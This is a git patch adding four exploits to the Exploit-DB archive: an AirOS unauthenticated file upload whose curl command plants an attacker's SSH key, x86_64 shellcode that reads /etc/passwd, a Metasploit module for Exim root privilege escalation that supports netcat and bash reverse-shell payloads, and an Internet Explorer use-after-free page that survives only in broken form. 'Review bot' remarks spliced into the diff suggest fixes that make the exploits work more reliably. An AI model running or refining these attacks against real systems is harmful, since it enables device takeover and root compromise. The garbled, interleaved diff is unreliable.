From 99627c8d04ec37100646e18d066f3383efa73be6 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Sat, 16 Apr 2016 05:02:22 +0000
Subject: [PATCH] DB: 2016-04-16
4 new exploits
Internet Explorer 11 - MSHTML!CMarkupPointer::UnEmbed Use After Free
Linux/x86_64 - Read /etc/passwd - 65 bytes
AirOS 6.x - Arbitrary File Upload
Exim _perl_startup_ Privilege Escalation
---
 files.csv | 4 +
 platforms/cgi/webapps/39701.txt | 37 ++++++++
 platforms/lin_x86-64/shellcode/39700.c | 66 ++++++++++++++
 platforms/linux/local/39702.rb | 59 +++++++++++++
 platforms/windows/dos/39699.html | 114 +++++++++++++++++++++++++
 5 files changed, 280 insertions(+)
 create mode 100755 platforms/cgi/webapps/39701.txt
 create mode 100755 platforms/lin_x86-64/shellcode/39700.c
 create mode 100755 platforms/linux/local/39702.rb
 create mode 100755 platforms/windows/dos/39699.html
diff --git a/files.csv b/files.csv
index 0a956c9a6..b8eacd954 100755
--- a/files.csv
+++ b/files.csv
@@ -35917,3 +35917,7 @@ id,file,description,date,author,platform,type,port
 39696,platforms/hardware/webapps/39696.txt,"Brickcom Corporation Network Cameras - Multiple Vulnerabilities",2016-04-14,Orwelllabs,hardware,webapps,80
 39697,platforms/php/webapps/39697.txt,"PHPmongoDB 1.0.0 - Multiple Vulnerabilities",2016-04-14,"Ozer Goker",php,webapps,80
 39698,platforms/windows/remote/39698.html,"Internet Explorer 9_ 10_ 11 - CDOMStringDataList::InitFromString Out-of-Bounds Read (MS15-112)",2016-04-14,"Ashfaq Ansari",windows,remote,0
+39699,platforms/windows/dos/39699.html,"Internet Explorer 11 - MSHTML!CMarkupPointer::UnEmbed Use After Free",2016-04-15,"Marcin Ressel",windows,dos,0
+39700,platforms/lin_x86-64/shellcode/39700.c,"Linux/x86_64 - Read /etc/passwd - 65 bytes",2016-04-15,"Ajith Kp",lin_x86-64,shellcode,0
+39701,platforms/cgi/webapps/39701.txt,"AirOS 6.x - Arbitrary File Upload",2016-04-15,93c08539,cgi,webapps,443
+39702,platforms/linux/local/39702.rb,"Exim _perl_startup_ Privilege Escalation",2016-04-15,metasploit,linux,local,0
diff --git a/platforms/cgi/webapps/39701.txt b/platforms/cgi/webapps/39701.txt
new file mode 100755
index 000000000..6d0a5f798
--- /dev/null
+++ b/platforms/cgi/webapps/39701.txt
@@ -0,0 +1,37 @@
+EDB-Note Source: https://hackerone.com/reports/73480
+
+Vulnerability
+
+It's possible to overwrite any file (and create new ones) on AirMax systems, because the "php2" (maybe because of a patch) don't verify the "filename" value of a POST request. It's possible to a unauthenticated user to exploit this vulnerability.
+Example
+
+Consider the following request:
+
+POST https://192.168.1.20/login.cgi HTTP/1.1
+Cookie: $Version=0; AIROS_SESSIONID=9192de9ba81691e3e4d869a7207ec80f; $Path=/; ui_language=en_US
+Content-Type: multipart/form-data; boundary=---------------------------72971515916103336881230390860
+Content-Length: 773
+User-Agent: Jakarta Commons-HttpClient/3.1
+Host: 192.168.1.20
+Cookie: $Version=0; AIROS_SESSIONID=7597f7f30cec75e1faef8fb608fc43bb; $Path=/; ui_language=en_US
+
+-----------------------------72971515916103336881230390860
+Content-Disposition: form-data; name="keyfile"; filename="../../etc/dropbear/authorized_keys"
+Content-Type: application/vnd.ms-publisher
+
+{{Your Public Key HERE}}
+-----------------------------72971515916103336881230390860--
+
+The web server must filter the file name ../../etc/dropbear/authorized_keys to just authorized_keys or return a 404. But the AirMax just received the file, overwriting the original (creating if don't exist) in the process. In this case the attacker are uploading arbitrary public ssh keys, but it can be used to upload configurations, or "/etc/passwd"...
+Consequences
+
+It's possible to take control over any AirMax Product with simple forged http POST request, what it disastrous.
+
+
+Reproducing
+
+With a simple command:
+curl -F "file=@.ssh/id_rsa.pub;filename=../../etc/dropbear/authorized_keys" -H "Expect:" 'https://192.168.1.20/login.cgi' -k
+
+Of course if the ssh is disabled you can overwrite /etc/passwd and/or /tmp/system.cfg.
+
diff --git a/platforms/lin_x86-64/shellcode/39700.c b/platforms/lin_x86-64/shellcode/39700.c
new file mode 100755
index 000000000..1be3de32e
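Review bot: The captured request and the reproduction command disagree on the multipart field name: the request sends the part as `name="keyfile"` while the curl line posts it as `-F "file=@..."`. If login.cgi only saves a specifically named part rather than every part it receives, one of the two examples will not reproduce; aligning the curl line to `curl -F "keyfile=@.ssh/id_rsa.pub;filename=../../etc/dropbear/authorized_keys" -H "Expect:" 'https://192.168.1.20/login.cgi' -k` would remove the ambiguity. The example request also carries two Cookie headers with different AIROS_SESSIONID values, which looks like a paste artifact and undercuts the stated point that no session is needed; dropping them would make the unauthenticated claim read cleanly. Finally, the text names only "AirOS 6.x" as affected and gives no fixed firmware build, so a line stating the affected and patched versions, if known, would help anyone triaging this.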
--- /dev/null
+++ b/platforms/lin_x86-64/shellcode/39700.c
@@ -0,0 +1,66 @@
+/*
+---------------------------------------------------------------------------------------------------
+
+Linux/x86_64 - Read /etc/passwd - 65 bytes
+
+Ajith Kp [ @ajithkp560 ] [ http://www.terminalcoders.blogspot.com ]
+
+Om Asato Maa Sad-Gamaya |
+Tamaso Maa Jyotir-Gamaya |
+Mrtyor-Maa Amrtam Gamaya |
+Om Shaantih Shaantih Shaantih |
+
+---------------------------------------------------------------------------------------------------
+Disassembly of section .text:
+
+Disassembly of section .text:
+
+0000000000400080 <.text>:
+ 400080: eb 2f jmp 0x4000b1
+ 400082: 5f pop rdi
+ 400083: 6a 02 push 0x2
+ 400085: 58 pop rax
+ 400086: 48 31 f6 xor rsi,rsi
+ 400089: 0f 05 syscall
+ 40008b: 66 81 ec ef 0f sub sp,0xfef
+ 400090: 48 8d 34 24 lea rsi,[rsp]
+ 400094: 48 97 xchg rdi,rax
+ 400096: 48 31 d2 xor rdx,rdx
+ 400099: 66 ba ef 0f mov dx,0xfef
+ 40009d: 48 31 c0 xor rax,rax
+ 4000a0: 0f 05 syscall
+ 4000a2: 6a 01 push 0x1
+ 4000a4: 5f pop rdi
+ 4000a5: 48 92 xchg rdx,rax
+ 4000a7: 6a 01 push 0x1
+ 4000a9: 58 pop rax
+ 4000aa: 0f 05 syscall
+ 4000ac: 6a 3c push 0x3c
+ 4000ae: 58 pop rax
+ 4000af: 0f 05 syscall
+ 4000b1: e8 cc ff ff ff call 0x400082
+ 4000b6: 2f (bad)
+ 4000b7: 65 74 63 gs je 0x40011d
+ 4000ba: 2f (bad)
+ 4000bb: 70 61 jo 0x40011e
+ 4000bd: 73 73 jae 0x400132
+ 4000bf: 77 64 ja 0x400125
+
+---------------------------------------------------------------------------------------------------
+
+How To Run
+
+$ gcc -o read_passwd read_passwd.c
+$ execstack -s read_passwd
+$ ./read_passwd
+
+---------------------------------------------------------------------------------------------------
+*/
+#include
+char sh[]="\xeb\x2f\x5f\x6a\x02\x58\x48\x31\xf6\x0f\x05\x66\x81\xec\xef\x0f\x48\x8d\x34\x24\x48\x97\x48\x31\xd2\x66\xba\xef\x0f\x48\x31\xc0\x0f\x05\x6a\x01\x5f\x48\x92\x6a\x01\x58\x0f\x05\x6a\x3c\x58\x0f\x05\xe8\xcc\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64";
+void main(int argc, char **argv)
+{
+ int (*func)();
+ func = (int
(*)()) sh;
+ (int)(*func)();
+}
diff --git a/platforms/linux/local/39702.rb b/platforms/linux/local/39702.rb
new file mode 100755
index 000000000..b7cb118a1
--- /dev/null
+++ b/platforms/linux/local/39702.rb
@@ -0,0 +1,59 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+
+ Rank = ExcellentRanking
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Exim "perl_startup" Privilege Escalation',
+ 'Description' => %q{
+ This module exploits a Perl injection vulnerability in Exim < 4.86.2
+ given the presence of the "perl_startup" configuration parameter.
+ },
+ 'Author' => [
+ 'Dawid Golunski', # Vulnerability discovery
+ 'wvu' # Metasploit module
+ ],
+ 'References' => [
+ %w{CVE 2016-1531},
+ %w{EDB 39549},
+ %w{URL http://www.exim.org/static/doc/CVE-2016-1531.txt}
+ ],
+ 'DisclosureDate' => 'Mar 10 2016',
+ 'License' => MSF_LICENSE,
+ 'Platform' => 'unix',
+ 'Arch' => ARCH_CMD,
+ 'SessionTypes' => %w{shell meterpreter},
+ 'Privileged' => true,
+ 'Payload' => {
+ 'BadChars' => "\x22\x27", # " and '
+ 'Compat' => {
+ 'PayloadType' => 'cmd cmd_bash',
+ 'RequiredCmd' => 'generic netcat netcat-e bash-tcp telnet'
+ }
+ },
+ 'Targets' => [
+ ['Exim < 4.86.2', {}]
+ ],
+ 'DefaultTarget' => 0
+ ))
+ end
+
+ def check
+ if exploit('whoami') == 'root'
+ CheckCode::Vulnerable
+ else
+ CheckCode::Safe
+ end
+ end
+
+ def exploit(c = payload.encoded)
+ # PERL5DB technique from http://perldoc.perl.org/perlrun.html
+ cmd_exec(%Q{PERL5OPT=-d PERL5DB='exec "#{c}"' exim -ps 2>&-})
+ end
+
+end
\ No newline at end of file
diff --git a/platforms/windows/dos/39699.html b/platforms/windows/dos/39699.html
new file mode 100755
index 000000000..e57ce62e5
--- /dev/null
+++ b/platforms/windows/dos/39699.html
@@ -0,0 +1,114 @@
+ + + + + + + + + + + + IE 11.0.9600.18230 MSHTML!CMarkupPointer::UnEmbed UAF POC + + +
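Review bot: The path string at the tail of the blob (`2f 65 74 63 2f 70 61 73 73 77 64` from 0x4000b6) carries no terminating 0x00, so the advertised 65 bytes exclude the NUL that the open(2) at 0x400089 needs; in this harness the C literal `char sh[]` appends one silently, but injected standalone the syscall reads whatever byte follows the payload. Either state that in the header, e.g. `/* path is not NUL-terminated: append \x00 (66 bytes) or ensure the byte after the blob is zero */`, or append `\x00` to the string and update the size. Separately, the read(2) result is moved straight into rdx by `xchg rdx,rax` at 0x4000a5 with no sign check, so if open or read fails the negative errno is handed to write(2) as its length. In the C harness `void main` should be `int main`, and the `#include` before `char sh[]` has lost its header name in this copy; since nothing from stdio is used it can simply be removed.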
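Review bot: The payload is spliced into a Perl double-quoted string (`PERL5DB='exec "#{c}"'`), so Perl interpolates `$`, `@` and backslash escapes in it before `exec` ever sees the command, yet `'BadChars' => "\x22\x27"` rules out only the two quote characters. A generated netcat or bash-tcp command containing `$` or `\` would be altered silently; extend the list to `'BadChars' => "\x22\x27\x24\x40\x5c", # " ' $ @ \`. Note also that `check` performs the full exploitation (`exploit('whoami')`), so a check run already executes a command as root on a vulnerable host; a comment on `def check` saying `# Intrusive: runs the exploit with a harmless command` would set operator expectations.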
||||
+ +